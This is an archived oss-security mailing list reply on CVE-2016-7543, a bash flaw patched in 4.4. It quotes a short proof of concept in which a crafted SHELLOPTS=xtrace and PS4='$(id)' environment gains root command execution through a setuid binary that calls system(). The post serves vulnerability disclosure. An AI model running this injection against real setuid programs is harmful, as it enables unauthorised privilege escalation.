[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: CVE-2016-7543 -- bash SHELLOPTS+PS4
From:       Tavis Ormandy <taviso () cmpxchg8b ! com>
Date:       2016-09-26 23:01:03
Message-ID: mpro.oe4vxq069usvx05jg.taviso () cmpxchg8b ! com
[Download RAW message or body]

up201407890@alunos.dcc.fc.up.pt wrote:

> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
> 
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
> 
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
> 
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' #
> chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06
> ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat
> Sep 10 18:06:36 WET 2016
> 
> Sorry Tavis :P
> 

Hah, nice work :-)

Tavis.

[prev in list] [next in list] [prev in thread] [next in thread]